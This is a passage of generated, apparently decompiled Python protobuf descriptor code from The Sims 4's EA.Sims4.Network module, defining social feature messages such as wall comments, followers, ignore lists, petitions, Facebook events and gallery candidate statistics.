options=None),
descriptor.FieldDescriptor(name='gallery_id',
full_name='EA.Sims4.Network.SocialDeleteWallCommentMessage.gallery_id',
index=1,
number=2,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='uuid',
full_name='EA.Sims4.Network.SocialDeleteWallCommentMessage.uuid',
index=2,
number=3,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=2477,
serialized_end=2562)
_SOCIALREQUESTFEEDWALLMESSAGE = descriptor.Descriptor(name='SocialRequestFeedWallMessage',
full_name='EA.Sims4.Network.SocialRequestFeedWallMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='ending_uuid',
full_name='EA.Sims4.Network.SocialRequestFeedWallMessage.ending_uuid',
index=0,
number=1,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='messages',
full_name='EA.Sims4.Network.SocialRequestFeedWallMessage.messages',
index=1,
number=2,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='unserialized_messages',
full_name='EA.Sims4.Network.SocialRequestFeedWallMessage.unserialized_messages',
index=2,
number=3,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='num_items',
full_name='EA.Sims4.Network.SocialRequestFeedWallMessage.num_items',
index=3,
number=4,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=2565,
serialized_end=2778)
_SOCIALREQUESTFOLLOWERSMESSAGE = descriptor.Descriptor(name='SocialRequestFollowersMessage',
full_name='EA.Sims4.Network.SocialRequestFollowersMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='playerid',
full_name='EA.Sims4.Network.SocialRequestFollowersMessage.playerid',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='id',
full_name='EA.Sims4.Network.SocialRequestFollowersMessage.id',
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='prev_last_persona',
full_name='EA.Sims4.Network.SocialRequestFollowersMessage.prev_last_persona',
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='num_request',
full_name='EA.Sims4.Network.SocialRequestFollowersMessage.num_request',
index=3,
number=4,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=2780,
serialized_end=2889)
_SOCIALREQUESTIGNORELISTMESSAGE = descriptor.Descriptor(name='SocialRequestIgnoreListMessage',
full_name='EA.Sims4.Network.SocialRequestIgnoreListMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='player_nucleus_id',
full_name='EA.Sims4.Network.SocialRequestIgnoreListMessage.player_nucleus_id',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=2891,
serialized_end=2950)
_SOCIALGETPLAYERINFOLISTMESSAGE_PLAYERINFO = descriptor.Descriptor(name='PlayerInfo',
full_name='EA.Sims4.Network.SocialGetPlayerInfoListMessage.PlayerInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='nucleus_id',
full_name='EA.Sims4.Network.SocialGetPlayerInfoListMessage.PlayerInfo.nucleus_id',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='origin_persona',
full_name='EA.Sims4.Network.SocialGetPlayerInfoListMessage.PlayerInfo.origin_persona',
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='first_party_persona',
full_name='EA.Sims4.Network.SocialGetPlayerInfoListMessage.PlayerInfo.first_party_persona',
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=3101,
serialized_end=3186)
_SOCIALGETPLAYERINFOLISTMESSAGE = descriptor.Descriptor(name='SocialGetPlayerInfoListMessage',
full_name='EA.Sims4.Network.SocialGetPlayerInfoListMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='player_nucleus_id',
full_name='EA.Sims4.Network.SocialGetPlayerInfoListMessage.player_nucleus_id',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='player_info_list',
full_name='EA.Sims4.Network.SocialGetPlayerInfoListMessage.player_info_list',
index=1,
number=2,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[
_SOCIALGETPLAYERINFOLISTMESSAGE_PLAYERINFO],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=2953,
serialized_end=3186)
_SOCIALCOMMENTPETITIONMESSAGE = descriptor.Descriptor(name='SocialCommentPetitionMessage',
full_name='EA.Sims4.Network.SocialCommentPetitionMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='nucleusid',
full_name='EA.Sims4.Network.SocialCommentPetitionMessage.nucleusid',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='commentid',
full_name='EA.Sims4.Network.SocialCommentPetitionMessage.commentid',
index=1,
number=2,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='commentKey',
full_name='EA.Sims4.Network.SocialCommentPetitionMessage.commentKey',
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=3188,
serialized_end=3276)
_SOCIALBIOPETITIONMESSAGE = descriptor.Descriptor(name='SocialBioPetitionMessage',
full_name='EA.Sims4.Network.SocialBioPetitionMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='nucleusid',
full_name='EA.Sims4.Network.SocialBioPetitionMessage.nucleusid',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='bio_nucleusid',
full_name='EA.Sims4.Network.SocialBioPetitionMessage.bio_nucleusid',
index=1,
number=2,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=3278,
serialized_end=3346)
_SOCIALFEEDREMOVALMESSAGE = descriptor.Descriptor(name='SocialFeedRemovalMessage',
full_name='EA.Sims4.Network.SocialFeedRemovalMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='feed_id',
full_name='EA.Sims4.Network.SocialFeedRemovalMessage.feed_id',
index=0,
number=1,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=3348,
serialized_end=3391)
_SOCIALCONTROLMESSAGE = descriptor.Descriptor(name='SocialControlMessage',
full_name='EA.Sims4.Network.SocialControlMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='opcode',
full_name='EA.Sims4.Network.SocialControlMessage.opcode',
index=0,
number=1,
type=14,
cpp_type=8,
label=2,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='subop',
full_name='EA.Sims4.Network.SocialControlMessage.subop',
index=1,
number=2,
type=14,
cpp_type=8,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='transactionId',
full_name='EA.Sims4.Network.SocialControlMessage.transactionId',
index=2,
number=3,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='result',
full_name='EA.Sims4.Network.SocialControlMessage.result',
index=3,
number=100,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='getwallcommentsmsg',
full_name='EA.Sims4.Network.SocialControlMessage.getwallcommentsmsg',
index=4,
number=4,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='postwallcommentmsg',
full_name='EA.Sims4.Network.SocialControlMessage.postwallcommentmsg',
index=5,
number=5,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='deletewallcommentmsg',
full_name='EA.Sims4.Network.SocialControlMessage.deletewallcommentmsg',
index=6,
number=6,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='friendmsg',
full_name='EA.Sims4.Network.SocialControlMessage.friendmsg',
index=7,
number=7,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='genericresponse',
full_name='EA.Sims4.Network.SocialControlMessage.genericresponse',
index=8,
number=8,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='playerinfo',
full_name='EA.Sims4.Network.SocialControlMessage.playerinfo',
index=9,
number=9,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='feedsubmsg',
full_name='EA.Sims4.Network.SocialControlMessage.feedsubmsg',
index=10,
number=10,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='searchresultmsg',
full_name='EA.Sims4.Network.SocialControlMessage.searchresultmsg',
index=11,
number=11,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='inviteresponsemsg',
full_name='EA.Sims4.Network.SocialControlMessage.inviteresponsemsg',
index=12,
number=12,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='originerror',
full_name='EA.Sims4.Network.SocialControlMessage.originerror',
index=13,
number=13,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='socialcassandratest',
full_name='EA.Sims4.Network.SocialControlMessage.socialcassandratest',
index=14,
number=14,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='socialfriendlistrequestmsg',
full_name='EA.Sims4.Network.SocialControlMessage.socialfriendlistrequestmsg',
index=15,
number=15,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='socialrequestnucleusidfrompersona',
full_name='EA.Sims4.Network.SocialControlMessage.socialrequestnucleusidfrompersona',
index=16,
number=16,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='socialnucleusidfrompersonaresponse',
full_name='EA.Sims4.Network.SocialControlMessage.socialnucleusidfrompersonaresponse',
index=17,
number=17,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='socialexchangemessage',
full_name='EA.Sims4.Network.SocialControlMessage.socialexchangemessage',
index=18,
number=18,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='socialrequestfeedwallmessage',
full_name='EA.Sims4.Network.SocialControlMessage.socialrequestfeedwallmessage',
index=19,
number=19,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='stat_tickers',
full_name='EA.Sims4.Network.SocialControlMessage.stat_tickers',
index=20,
number=21,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='comment_petition_msg',
full_name='EA.Sims4.Network.SocialControlMessage.comment_petition_msg',
index=21,
number=22,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='feedremovalmsg',
full_name='EA.Sims4.Network.SocialControlMessage.feedremovalmsg',
index=22,
number=23,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='bio_petition_msg',
full_name='EA.Sims4.Network.SocialControlMessage.bio_petition_msg',
index=23,
number=24,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='fb_event_msg',
full_name='EA.Sims4.Network.SocialControlMessage.fb_event_msg',
index=24,
number=25,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='requestfollowers_msg',
full_name='EA.Sims4.Network.SocialControlMessage.requestfollowers_msg',
index=25,
number=26,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='responsefollowers_msg',
full_name='EA.Sims4.Network.SocialControlMessage.responsefollowers_msg',
index=26,
number=27,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='requestignorelist_msg',
full_name='EA.Sims4.Network.SocialControlMessage.requestignorelist_msg',
index=27,
number=28,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='response_player_info_list_msg',
full_name='EA.Sims4.Network.SocialControlMessage.response_player_info_list_msg',
index=28,
number=29,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='player_identification_list_msg',
full_name='EA.Sims4.Network.SocialControlMessage.player_identification_list_msg',
index=29,
number=30,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='candidate_msg',
full_name='EA.Sims4.Network.SocialControlMessage.candidate_msg',
index=30,
number=31,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='evaluation_results_msg',
full_name='EA.Sims4.Network.SocialControlMessage.evaluation_results_msg',
index=31,
number=32,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='cg_update_msg',
full_name='EA.Sims4.Network.SocialControlMessage.cg_update_msg',
index=32,
number=33,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=3394,
serialized_end=5713)
_SOCIALINVALIDATEMSG = descriptor.Descriptor(name='SocialInvalidateMsg',
full_name='EA.Sims4.Network.SocialInvalidateMsg',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='cache_index',
full_name='EA.Sims4.Network.SocialInvalidateMsg.cache_index',
index=0,
number=1,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='key',
full_name='EA.Sims4.Network.SocialInvalidateMsg.key',
index=1,
number=2,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=5715,
serialized_end=5770)
_SOCIALCONTROLQUEUEBROADCASTMESSAGE = descriptor.Descriptor(name='SocialControlQueueBroadcastMessage',
full_name='EA.Sims4.Network.SocialControlQueueBroadcastMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='control',
full_name='EA.Sims4.Network.SocialControlQueueBroadcastMessage.control',
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='friendIds',
full_name='EA.Sims4.Network.SocialControlQueueBroadcastMessage.friendIds',
index=1,
number=3,
type=4,
cpp_type=4,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=(descriptor._ParseOptions(descriptor_pb2.FieldOptions(), '\x10\x01')))],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=5772,
serialized_end=5888)
_LIFEEVENTMESSAGE = descriptor.Descriptor(name='LifeEventMessage',
full_name='EA.Sims4.Network.LifeEventMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='type',
full_name='EA.Sims4.Network.LifeEventMessage.type',
index=0,
number=1,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='sim_ids',
full_name='EA.Sims4.Network.LifeEventMessage.sim_ids',
index=1,
number=2,
type=6,
cpp_type=4,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=(descriptor._ParseOptions(descriptor_pb2.FieldOptions(), '\x10\x01')))],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=5890,
serialized_end=5943)
_SOCIALFACEBOOKEVENTMESSAGE = descriptor.Descriptor(name='SocialFacebookEventMessage',
full_name='EA.Sims4.Network.SocialFacebookEventMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='objectId',
full_name='EA.Sims4.Network.SocialFacebookEventMessage.objectId',
index=0,
number=1,
type=9,
cpp_type=9,
label=2,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='accessToken',
full_name='EA.Sims4.Network.SocialFacebookEventMessage.accessToken',
index=1,
number=2,
type=9,
cpp_type=9,
label=2,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='guid',
full_name='EA.Sims4.Network.SocialFacebookEventMessage.guid',
index=2,
number=3,
type=9,
cpp_type=9,
label=2,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=5945,
serialized_end=6026)
_SOCIALCANDIDATESTATISTICSUBMESSAGE = descriptor.Descriptor(name='SocialCandidateStatisticSubmessage',
full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='remote_id',
full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage.remote_id',
index=0,
number=1,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='views_count',
full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage.views_count',
index=1,
number=2,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='wins_count',
full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage.wins_count',
index=2,
number=3,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='platform',
full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage.platform',
index=3,
number=4,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='category',
full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage.category',
index=4,
number=5,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='was_reported',
full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage.was_reported',
index=5,
number=6,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=(descriptor._ParseOptions(descriptor_pb2.FieldOptions(), '\x18\x01'))),
descriptor.FieldDescriptor(name='expires_epoch_sec',
full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage.expires_epoch_sec',
index=6,
number=7,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=6029,
serialized_end=6214)
_SOCIALCANDIDATESMESSAGE = descriptor.Descriptor(name='SocialCandidatesMessage',
full_name='EA.Sims4.Network.SocialCandidatesMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='count',
full_name='EA.Sims4.Network.SocialCandidatesMessage.count',
index=0,
number=1,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='platform_restriction',
full_name='EA.Sims4.Network.SocialCandidatesMessage.platform_restriction',
index=1,
number=2,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='category_restriction',
full_name='EA.Sims4.Network.SocialCandidatesMessage.category_restriction',
index=2,
number=3,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='challenge',
full_name='EA.Sims4.Network.SocialCandidatesMessage.challenge',
index=3,
number=4,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='digest',
full_name='EA.Sims4.Network.SocialCandidatesMessage.digest',
index=4,
number=5,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='candidates',
full_name='EA.Sims4.Network.SocialCandidatesMessage.candidates',
index=5,
number=6,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='expire_epoch_secs',
full_name='EA.Sims4.Network.SocialCandidatesMessage.expire_epoch_secs',
index=6,
number=7,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=6217,
serialized_end=6453)
_SOCIALEVALUATIONRESULTSMESSAGE = descriptor.Descriptor(name='SocialEvaluationResultsMessage',
full_name='EA.Sims4.Network.SocialEvaluationResultsMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='winner_ids',
full_name='EA.Sims4.Network.SocialEvaluationResultsMessage.winner_ids',
index=0,
number=1,
type=9,
cpp_type=9,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='loser_ids',
full_name='EA.Sims4.Network.SocialEvaluationResultsMessage.loser_ids',
index=1,
number=2,
